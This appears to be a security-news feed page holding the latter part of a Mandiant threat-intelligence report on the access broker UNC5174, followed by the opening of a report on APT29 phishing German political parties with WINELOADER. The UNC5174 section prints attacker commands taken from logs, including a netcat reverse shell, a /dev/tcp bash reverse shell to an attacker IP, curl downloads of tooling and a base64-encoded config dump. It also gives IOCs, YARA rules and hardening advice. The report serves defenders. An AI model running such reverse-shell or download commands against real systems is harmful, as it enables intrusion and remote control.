<div class="block-paragraph_advanced"><pre class="language-plain"><code>Nov  2 07:30:37 localhost.localdomain notice icrd_child[18778]: 
01420002:5: AUDIT - pid=18778 user=admin folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=run util bash 
-c "nc 172.104.124[.]74 443 -e /bin/bash &amp;"</code></pre>
<p><span>Table 5: UNC5174 command to download a netcat web shell</span></p></div>
<div class="block-paragraph_advanced"><h3>Internal Reconnaissance</h3>
<p>Shell command history artifacts on the compromised F5 appliance recorded evidence of the threat actor downloading the file "/tmp/ss" from the same infrastructure hosting GOREVERSE and SUPERSHELL payloads, as well as GitHub, using the cURL command.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>curl -o /tmp/ss hxxp://172.104.124[.]74/App-amd64linux-noupx</code></pre>
<pre class="language-plain"><code>curl -o /tmp/ss hxxps://github[.]com/1n7erface/Template/releases
/download/v1.2.5/App-amd64linux-noupx</code></pre>
<p><span>Table 6: UNC5174 command downloading unidentified additional tooling suspected of internal reconnaissance functionality</span></p></div>
<div class="block-paragraph_advanced"><p>The file "/tmp/ss" was not recoverable at the time of analysis; however, the GitHub URL resource https://github.com/1n7erface/Template hosts a likely related network scanning and reconnaissance tool with Chinese-language instructions. Execution of "/tmp/ss" was recorded in shell history, and command-line arguments indicate the tool was likely used to scan internal subnet ranges from the compromised F5 appliance using the tool <a href="https://github.com/shadow1ng/fscan" rel="noopener" target="_blank">FSCAN</a>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>./ss -i &lt;Internal CIDR block&gt;</code></pre>
<p><span>Table 7: UNC5174 command to scan internal subnet ranges from compromised F5 appliances</span></p></div>
<div class="block-paragraph_advanced"><h3>GOHEAVY Tunneler: A Closer Look</h3>
<p>UNC5174 employs a Golang-based tunneler tool named GOHEAVY, obfuscated using GOBFUSCATE for added stealth. This tool leverages the Gin framework to manage traffic routing functionalities. Mandiant observed GOHEAVY engaging in simultaneous communication with an external C2 server operated by SUPERSHELL administrators while opening and listening on a vast number of local UDP ports. Interestingly, GOHEAVY continuously broadcasts the string "SpotUdp" to existing network interfaces.</p>
<p>This behavior suggests the tool's purpose lies in establishing covert communication channels and potentially facilitating lateral movement within compromised networks. The continuous "SpotUdp" broadcast might serve as a beacon for identifying other compromised machines running GOHEAVY within the same network</p>
<p>In addition to GOHEAVY, Mandiant observed the presence of various other tools common in red teaming, including:</p>
<ul>
<li>SLIVER client</li>
<li>FFUFP</li>
<li>SQLMAP</li>
<li>DIRBUSTER</li>
<li>METASPLOIT</li>
<li>AFROG penetration testing tool</li>
<li>NUCLEI vulnerability scanning templates</li>
</ul>
<h3>UNC5174 Closes the Door Behind Them</h3>
<p>Mandiant observed an unusual behavior by UNC5174 following their initial access on the compromised appliance. After backdoor accounts were configured, they attempted to self-patch the vulnerability using an F5-provided mitigation script "<a href="http://mitigation.sh/" rel="noopener" target="_blank"><u>mitigation.sh</u></a>". Mandiant assesses that this was an attempt to limit subsequent exploitation of the system by additional unrelated threat actors attempting to access the appliance. The additional commands were observed during their initial access on the compromised appliance:</p>
<ul>
<li>bash execution CVE-2023-46747 command run for account root6 from (HK) 61.239.68.73</li>
<li>28/10 14:16:23 deleted user root6</li>
<li>28/10 14:27:35: ran command cmd_data=run /util bash -c /root/mitigation.sh -u</li>
<li>4/11/2023 03:36:30 /tmp/.del</li>
</ul>
<h2>UNC5174 Targets ScreenConnect Vulnerability</h2>
<p>On Feb. 21, 2024, the actor "uteus" claimed in forum postings to have successfully exploited the vulnerability CVE-2024-1709 in ConnectWise ScreenConnect instances belonging to hundreds of organizations globally, primarily in the U.S. and Canada. </p>
<p>Mandiant obtained the output of the actor's exploit, which showed the actor added the admin user "cvetest" to ScreenConnect instances belonging to numerous organizations. Mandiant has observed other threat actors similarly adding admin accounts at multiple victim organizations.  Mandiant was also able to confirm the compromise of several ScreenConnect instances and the presence of unauthorized users added by the uteus persona tracked as UNC5174. Mandiant assesses with moderate confidence the other organizations listed by uteus were also compromised.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig3.max-1000x1000.png" alt="Geographic distribution of UNC5174 ScreenConnect targeting">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="xi4hf">Figure 3: Geographic distribution of UNC5174 ScreenConnect targeting</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Attribution</h2>
<p>Mandiant has identified a new access operations group UNC5174 that uses the personas "Uteus" (alternate spelling "uetus") on underground forums, which we assess with moderate confidence operates from China. UNC5174 was linked with several hacktivist collectives including "Dawn Calvary" and "Genesis Day" prior to 2023 and has also claimed to be affiliated with the PRC MSS as an access broker and possible contractor who conducts for profit intrusions.</p>
<h3>Chinese Hacktivists, UNC302, and UNC5174 Link to MSS Contractors</h3>
<p>Mandiant assesses UNC5174 (aka Uteus) was previously a member of Chinese hacktivist collectives "Dawn Calvary" and has collaborated with "Genesis Day" / "Xiaoqiying" and "Teng Snake." This individual appears to have departed these groups in mid-2023 and has since focused on executing access operations with the intention of brokering access to compromised environments.</p>
<p>As part of our investigation, Mandiant identified key details that suggest UNC5174 may be an initial access broker acting as an MSS contractor. The actor claimed MSS affiliation in dark web forums, claiming tacit backing of an unspecified MSS-related APT actor. Additionally, the impacted organizations targeted by UNC5174, including U.S. defense and UK government entities, were targeted concurrently by distinct known MSS access brokers UNC302, which were previously <a href="https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion" rel="noopener" target="_blank"><u>indicted</u></a> by the U.S. Department of Justice in 2020. </p>
<p>On Oct. 10, 2023, Mandiant identified event logs suggesting unconfirmed exploitation of an F5 device IP address of several government entities. This activity was associated with the UNC5174 pseudonym "Uteus", which shared this purported access to a U.S. military contractor and UK government organization in an online communication. The same IP address targeted through the previously described CVE-2023-46747 exploitation appeared in communications from this access broker, claiming successful exploitation of Confluence vulnerability CVE-2023-22515. Details of the intrusion were discovered within communications on a dark web forum. The Uteus persona indicated they had utilized a <a href="https://github.com/Chocapikk/CVE-2023-22515" rel="noopener" target="_blank"><u>public proof of concept</u></a> to perform activities on compromised systems. Notably, Uteus is believed to be distinct from the entity "Xiaoqiying," which has independently claimed to not be employed by the Chinese Government in a Telegram channel operated by the group.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig4.max-1000x1000.png" alt="Telegram channel for Xiaoqiying claiming no employment with the Chinese government">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="xi4hf">Figure 4: Telegram channel for Xiaoqiying claiming no employment with the Chinese government</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>Based on these findings, Mandiant assesses with moderate confidence that Uteus represents an initial access broker persona for UNC5174, used to sell obtained access to compromised systems. While definitive connections cannot be established at this time, Mandiant highlights that there are similarities between UNC5174 and UNC302, which suggests they operate within an MSS initial access broker landscape. These similarities suggest possible shared exploits and operational priorities between these threat actors, although further investigation is required for definitive attribution.</p>
<h2>Outlook and Implications</h2>
<p>UNC5174 exploitation of CVE-2023-46747 as a N-day vulnerability in tandem with recent exploitation of Connectwise ScreenConnect vulnerability CVE-2024-1709 demonstrates PRC-related threat actors' systematized approach to achieving access to targets of strategic or political interest to the PRC. China-nexus actors continue to conduct vulnerability research on widely deployed edge appliances like F5 BIG-IP and ScreenConnect to enable espionage operations at scale. These operations often include rapid exploitation of recently disclosed vulnerabilities using custom or publicly available proof-of-concept exploits. UNC5174 and UNC302 operate within this model, and their operations provide insight into the initial access broker ecosystem leveraged by the MSS to target strategically interesting global organizations. Mandiant believes that UNC5174 will continue to pose a threat to organizations in the academic, NGO, and government sectors specifically in the United States, Canada, Southeast Asia, Hong Kong, and the United Kingdom.</p>
<h2>Remediation and Hardening</h2>
<p>Mandiant recommends performing the following remediation and hardening actions on impacted F5 appliances:</p>
<ul>
<li>Restrict access to the F5 TMUI from the internet.</li>
<li>Immediately apply the F5 mitigation script published in [<a href="https://my.f5.com/manage/s/article/K000137353" rel="noopener" target="_blank"><u>K000137353</u></a>] to any vulnerable F5 appliances.</li>
<li>Investigate vulnerable F5 appliances for evidence of compromise.</li>
</ul>
<p>In the event of F5 compromise:</p>
<ul>
<li>Review appliance configurations for unauthorized modifications.</li>
<li>Review file system and operating system (OS) artifacts for evidence of privileged account creation and remove any unauthorized accounts.</li>
<li>Consider revoking and re-issuing sensitive cryptographic material such as certificates and private keys that may have been accessible to a threat actor.</li>
</ul>
<p>For impacted ScreenConnect instances, Mandiant recommends that organizations with an on-premises controller <a href="https://services.google.com/fh/files/misc/connectwise-screenconnect-remediation-hardening-guide.pdf" rel="noopener" target="_blank"><u>read our latest ScreenConnect remediation and hardening guide</u></a>.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<h3>Network IOCs</h3></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>IP Address</strong></p>
</td>
<td>
<p><strong>ASN</strong></p>
</td>
<td>
<p><strong>NetBlock</strong></p>
</td>
<td>
<p><strong>Location</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>118.140.151[.]242 </span></p>
</td>
<td>
<p><span>9304</span></p>
</td>
<td>
<p><span>HGC Global Communications Limited</span></p>
</td>
<td>
<p><span>(HK)</span></p>
</td>
</tr>
<tr>
<td>
<p><span>61.239.68[.]73 </span></p>
</td>
<td>
<p><span>9269</span></p>
</td>
<td>
<p><span>Hong Kong Broadband Network Ltd.</span></p>
</td>
<td>
<p><span>(HK)</span></p>
</td>
</tr>
<tr>
<td>
<p><span>172.245.68[.]110</span></p>
</td>
<td>
<p><span>36352</span><a href="https://www.virustotal.com/gui/search/entity%253Aip%2520as_owner%253AAS-COLOCROSSING" rel="noopener" target="_blank"><span> </span></a></p>
</td>
<td>
<p><span>Colocrossing</span></p>
</td>
<td>
<p><span>(U.S.)</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>URLs</h3>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>URL</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>http://172.245.68[.]110:8888 </span></p>
</td>
<td>
<p><span>SUPERSHELL C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>Host IOCs</h3>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>MD5 Hash</span></strong></p>
</td>
<td>
<p><strong><span>Filename</span></strong></p>
</td>
<td>
<p><strong><span>Type</span></strong></p>
</td>
<td>
<p><strong><span>Code Family</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><span>c867881c56698f938b4e8edafe76a09b</span></p>
</td>
<td>
<p><span>LG</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>df4603548b10211f0aa77d0e9a172438</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0951109dd1be0d84a33d52c135ba9c97</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>9c3bf506dd19c08c0ed3af9c1708a770</span></p>
</td>
<td>
<p><span>memfd:a</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0ba435460fb7622344eec28063274b8a</span></p>
</td>
<td>
<p><span>undefined</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>a78bf3d16349eba86719539ee8ef562d</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>Host Based Indicators (Commands)</h3>
<pre class="language-plain"><code>cmd_data=run util bash -c "echo 
dG1zaCAtcSAtYyAnY2QgLztzaG93IHJ1bm5pbmctY29uZmlnIHJlY3Vyc2l2ZSc= 
| base64 -d | sh"  "tmsh -q -c 'cd /;show running-config recursive'"
run util bash -c "bash -i /dev/tcp/172.104.124.74/443 0&gt;&amp;1 &amp;"</code></pre></div>
<div class="block-paragraph_advanced"><h3>Detections</h3>
<pre class="language-plain"><code>rule M_Backdoor_GOREVERSE_2
{
        meta:
                author = "Mandiant"
                description = "This rule is designed to detect events related 
to goreverse. GOREVERSE is a publicly available reverse shell"
                md5 = "5c175ea3664279d6c0c2609844de6949"
                platforms = "Windows,Linux,MacOS"
                malware_family = "GOREVERSE"
        strings:
                $cc_main_fork_amd64 = { 41 81 39 74 72 75 65 75 ?? 48 8B 
[5] 48 8B [5] 48 8B [5] 4C 8B [5] 48 8B [5] 48 8B [5-10] E8 [4] 48 8B }
                $cc_print_help_amd64 = { 48 8D 15 [4] 48 89 94 24 [4-16] 48 
8B 1D [4] 48 8D 05 [4-24] BF 03 00 00 00 48 89 FE [0-12] E8 }
                $cc_rssh = "rssh" fullword
                $cc_validate_dest_len = { 48 83 3D [4] 00 [1-24] 49 83 FC 01 
[1-24] 49 C1 E4 05 [1-64] 83 3D [4] 00 }
                $str1 = "--[foreground|fingerprint|proxy|process_name] 
-d|--destination &lt;server_address&gt;"
                $str2 = "-d or --destination Server connect back address 
(can be baked in)"
                $str3 = "--foreground Causes the client to run without 
forking to background"
                $str4 = "--fingerprint Server public key SHA256 hex 
fingerprint for auth"
                $str5 = "--proxy Location of HTTP connect proxy to use"
                $str6 = "--process_name Process name shown in 
tasklist/process list"
        condition:
                ( ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) 
or (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0) 
== 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or (uint16(0) == 0x5a4d 
and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) 
and (all of ($str*) or all of ($cc_*))
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Downloader_SNOWLIGHT_1 
{
        meta:
                author = "Mandiant"
                description = "This rule is designed to detect 
the SNOWLIGHT code family"
                md5 = "0951109dd1be0d84a33d52c135ba9c97"
                platforms = "Linux"
                malware_family = "SNOWLIGHT"
        strings:
                $xor99 = { 80 31 99 48 FF C1 89 CE 29 EE 39 C6 
7C F2 48 63 D2 48 89 EE 44 89 E7 }
                $memfdcreate = { BA 01 00 00 00 BE 3B 0B 40 
00 BF 3F 01 00 00 E8 8C FE FF FF }	
        condition:
                uint32(0) == 0x464c457f and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><h2>Mandiant Security Validation Actions</h2>
<p>Organizations can validate their security controls using the following actions with <a href="https://cloud.google.com/security/products/threat-intelligence" rel="noopener" target="_blank"><u>Mandiant Security Validation</u></a>.</p></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>VID</strong></p>
</td>
<td>
<p><strong>Name</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-917</span></p>
</td>
<td>
<p><span>Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, Exploitation</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-916</span></p>
</td>
<td>
<p><span>Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, User Authentication</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A107-059</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-1708, Exploitation, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A107-056</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-1709, Exploitation, Variant #1</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h2>MITRE ATT&amp;CK</h2>
<p>Mandiant has observed UNC5174 use the following techniques:</p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><span>Initial Access</span></p>
</td>
<td>
<p><span>T1190</span></p>
</td>
<td>
<p><span>Exploit Public-Facing Application</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Defense Evasion</span></p>
</td>
<td>
<p><span>T1027</span></p>
</td>
<td>
<p><span>Obfuscated Files or Information</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1070.004</span></p>
</td>
<td>
<p><span>File Deletion</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1140</span></p>
</td>
<td>
<p><span>Deobfuscate/Decode Files or Information</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1222.002</span></p>
</td>
<td>
<p><span>Linux and Mac File and Directory Permissions Modification</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1601.001</span></p>
</td>
<td>
<p><span>Patch System Image</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Discovery</span></p>
</td>
<td>
<p><span>T1016</span></p>
</td>
<td>
<p><span>System Network Configuration Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1049</span></p>
</td>
<td>
<p><span>System Network Connections Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1082</span></p>
</td>
<td>
<p><span>System Information Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1083</span></p>
</td>
<td>
<p><span>File and Directory Discovery</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Command and Control</span></p>
</td>
<td>
<p><span>T1095</span></p>
</td>
<td>
<p><span>Non-Application Layer Protocol</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1105</span></p>
</td>
<td>
<p><span>Ingress Tool Transfer</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1572</span></p>
</td>
<td>
<p><span>Protocol Tunneling</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1573.002</span></p>
</td>
<td>
<p><span>Asymmetric Cryptography</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Execution</span></p>
</td>
<td>
<p><span>T1059</span></p>
</td>
<td>
<p><span>Command and Scripting Interpreter</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1059.004</span></p>
</td>
<td>
<p><span>Unix Shell</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Persistence</span></p>
</td>
<td>
<p><span>T1136.001</span></p>
</td>
<td>
<p><span>Local Account</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Impact</span></p>
</td>
<td>
<p><span>T1531</span></p>
</td>
<td>
<p><span>Account Access Removal</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Credential Access</span></p>
</td>
<td>
<p><span>T1003.008</span></p>
</td>
<td>
<p><span>/etc/passwd and /etc/shadow</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Resource Development</span></p>
</td>
<td>
<p><span>T1608.003</span></p>
</td>
<td>
<p><span>Install Digital Certificate</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><br>Mandiant has observed UNC302 use the following techniques:<br><br></span></p>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><span>Initial Access</span></p>
</td>
<td>
<p><span>T1133</span></p>
</td>
<td>
<p><span>External Remote Services</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1189</span></p>
</td>
<td>
<p><span>Drive-by Compromise</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1190</span></p>
</td>
<td>
<p><span>Exploit Public-Facing Application</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Collection</span></p>
</td>
<td>
<p><span>T1213</span></p>
</td>
<td>
<p><span>Data from Information Repositories</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1560</span></p>
</td>
<td>
<p><span>Archive Collected Data</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1560.001</span></p>
</td>
<td>
<p><span>Archive via Utility</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Persistence</span></p>
</td>
<td>
<p><span>T1505.003</span></p>
</td>
<td>
<p><span>Web Shell</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Defense Evasion</span></p>
</td>
<td>
<p><span>T1027</span></p>
</td>
<td>
<p><span>Obfuscated Files or Information</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1036</span></p>
</td>
<td>
<p><span>Masquerading</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1070.004</span></p>
</td>
<td>
<p><span>File Deletion</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1112</span></p>
</td>
<td>
<p><span>Modify Registry</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1134</span></p>
</td>
<td>
<p><span>Access Token Manipulation</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1497</span></p>
</td>
<td>
<p><span>Virtualization/Sandbox Evasion</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Impact</span></p>
</td>
<td>
<p><span>T1529</span></p>
</td>
<td>
<p><span>System Shutdown/Reboot</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Execution</span></p>
</td>
<td>
<p><span>T1059.003</span></p>
</td>
<td>
<p><span>Windows Command Shell</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1059.005</span></p>
</td>
<td>
<p><span>Visual Basic</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1203</span></p>
</td>
<td>
<p><span>Exploitation for Client Execution</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Discovery</span></p>
</td>
<td>
<p><span>T1012</span></p>
</td>
<td>
<p><span>Query Registry</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1016</span></p>
</td>
<td>
<p><span>System Network Configuration Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1057</span></p>
</td>
<td>
<p><span>Process Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1082</span></p>
</td>
<td>
<p><span>System Information Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1083</span></p>
</td>
<td>
<p><span>File and Directory Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1518</span></p>
</td>
<td>
<p><span>Software Discovery</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Credential Access</span></p>
</td>
<td>
<p><span>T1003</span></p>
</td>
<td>
<p><span>OS Credential Dumping</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Lateral Movement</span></p>
</td>
<td>
<p><span>T1021.001</span></p>
</td>
<td>
<p><span>Remote Desktop Protocol</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Resource Development</span></p>
</td>
<td>
<p><span>T1583.003</span></p>
</td>
<td>
<p><span>Virtual Private Server</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1584</span></p>
</td>
<td>
<p><span>Compromise Infrastructure</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Command and Control</span></p>
</td>
<td>
<p><span>T1071.001</span></p>
</td>
<td>
<p><span>Web Protocols</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1071.004</span></p>
</td>
<td>
<p><span>DNS</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1095</span></p>
</td>
<td>
<p><span>Non-Application Layer Protocol</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[APT29 Uses WINELOADER to Target German Political Parties]]></title>
<description><![CDATA[Written by: Luke Jenkins, Dan Black

 
Executive Summary

In late February, APT29 used a new backdoor variant publicly tracked as WINELOADER to target German political parties with a CDU-themed lure.  
This is the first time we have seen this APT29 cluster target political parties, indicating a p...]]></description>
<link>https://tsecurity.de/de/3578873/it-security-nachrichten/apt29-uses-wineloader-to-target-german-political-parties/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578873/it-security-nachrichten/apt29-uses-wineloader-to-target-german-political-parties/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Luke Jenkins, Dan Black</p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><h2>Executive Summary</h2>
<ul>
<li>In late February, APT29 used a new backdoor variant publicly tracked as WINELOADER to target German political parties with a CDU-themed lure.  </li>
<li>This is the first time we have seen this APT29 cluster target political parties, indicating a possible area of emerging operational focus beyond the typical targeting of diplomatic missions.</li>
<li>Based on the SVR’s responsibility to collect political intelligence and this APT29 cluster’s historical targeting patterns, we judge this activity to present a broad threat to European and other Western political parties from across the political spectrum.</li>
<li>Please see the Technical Annex for technical details and MITRE ATT&amp;CK techniques, (T1543.003, T1012, T1082, T1134, T1057, T1007, T1027, T1070.004, T1055.003 and T1083)</li>
</ul>
<h2>Threat Detail</h2>
<p>In late February 2024, Mandiant identified APT29 — a Russian Federation backed threat group linked by <a href="https://cert.pl/en/posts/2023/12/apt29-teamcity/" rel="noopener" target="_blank"><u>multiple governments</u></a> to Russia’s Foreign Intelligence Service (SVR) — conducting a phishing campaign targeting German political parties. Consistent with APT29 operations extending back to 2021, this operation leveraged APT29’s mainstay first-stage payload ROOTSAW (aka EnvyScout) to deliver a new backdoor variant publicly tracked as <a href="https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader" rel="noopener" target="_blank"><u>WINELOADER</u></a>. </p>
<p>Notably, this activity represents a departure from this APT29 initial access cluster’s typical remit of targeting governments, foreign embassies, and other diplomatic missions, and is the first time Mandiant has seen an operational interest in political parties from this APT29 subcluster. Additionally, while APT29 has previously <a href="https://cloud.google.com/blog/topics/threat-intelligence/apt29-evolving-diplomatic-phishing" rel="noopener" target="_blank"><u>used</u></a> lure documents bearing the logo of German government organizations, this is the first instance where we have seen the group use German-language lure content — a possible artifact of the targeting differences (i.e. domestic vs. foreign) between the two operations. </p>
<ul>
<li>Phishing emails were sent to victims purporting to be an invite to a dinner reception on 01 March bearing a logo from the Christian Democratic Union (CDU), a major political party in Germany (see Figure 1). </li>
<li>The German-language lure document contains a phishing link directing victims to a malicious ZIP file containing a ROOTSAW dropper hosted on an actor-controlled compromised website “https://waterforvoiceless[.]org/invite.php”. </li>
<li>ROOTSAW delivered a second-stage CDU-themed lure document and a next stage <a href="https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader" rel="noopener" target="_blank"><u>WINELOADER</u></a> payload retrieved from “waterforvoiceless[.]org/util.php”. 
<ul>
<li>WINELOADER was first observed in operational use in late January 2024 in an operation targeting likely diplomatic entities in Czechia, Germany, India, Italy, Latvia, and Peru. </li>
<li>The backdoor contains several features and functions that overlap with several known APT29 malware families including BURNTBATTER, MUSKYBEAT and BEATDROP, indicating they are likely created by a common developer (see Technical Annex for additional details).</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/apt29-wineloader-fig1.max-1000x1000.png" alt="Lure document redirecting victims to an APT29 controlled compromised WordPress website hosting ROOTSAW">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="dv45t">Figure 1: Lure document redirecting victims to an APT29 controlled compromised WordPress website hosting ROOTSAW</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/apt29-wineloader-fig2.max-1000x1000.png" alt="Second CDU lure displayed by ROOTSAW downloader">
        
